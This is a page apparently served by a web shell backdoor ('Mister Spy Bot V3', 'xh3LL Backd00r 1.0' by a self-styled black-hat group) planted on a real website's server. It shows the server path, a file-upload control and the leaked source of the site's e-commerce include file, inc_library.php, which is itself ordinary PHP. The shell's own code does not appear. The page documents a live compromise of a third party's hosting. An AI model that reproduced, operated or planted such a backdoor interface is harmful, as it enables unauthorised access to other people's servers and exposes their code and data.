Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/
Upload File :
Current File : /home/caballoscriollos/www/web/inc_library.php

<?php
if(!isset($_SERVER["HTTPS"]) || $_SERVER["HTTPS"] != "on")
{
    //Tell the browser to redirect to the HTTPS URL.
    header("Location: https://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"], true, 301);
    //Prevent the rest of the script from executing.
    exit;
}
error_reporting(E_ERROR | E_PARSE);
session_cache_limiter('private-no-cache');
session_cache_expire(500);

/* inluimos clases de sesion */
require_once('library/class.compras.php');
require_once('library/class.session.php');
require_once('library/class.sessionfront.php');

/* incluimos libreria para manipulaar imagenes */
require_once('thumbnail/thumblib.inc.php');

/* incluimos archivo para la carga de clases */
require_once('inc_loader.php');

/* inicializamos sesion y sistema e-commerce */
SessionFront::Initialize();
Session::Initialize();
Compras::Initialize();

/* obtenemos el administrador logueado */
$currentUser = Session::GetCurrentUser();

/* obtenemos los datos de configuracion */
$oConfiguraciones = new Configuraciones();
$oConfiguracion = $oConfiguraciones->GetRow();

/* obtenemos los datos de la empresa */
$oDatosEmpresa = new DatosEmpresa();
$oDatosEmpresa = $oDatosEmpresa->GetRow();

/* determinamos el tipo de listado en caso de que no esté definido */
$_SESSION['IdTipoListado'] = (isset($_SESSION['IdTipoListado'])) ? $_SESSION['IdTipoListado'] : ListadoTipos::Imagenes;

/* eliminamos variables de sesion y globales por cuestiones de seguridad */
if (ini_get('register_globals') == 1)
{
	if (is_array($_REQUEST)) foreach(array_keys($_REQUEST) as $var_to_kill) unset($$var_to_kill);
	if (is_array($_SESSION)) foreach(array_keys($_SESSION) as $var_to_kill) unset($$var_to_kill);
	if (is_array($_SERVER))  foreach(array_keys($_SERVER)  as $var_to_kill) unset($$var_to_kill);
    unset($var_to_kill);
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat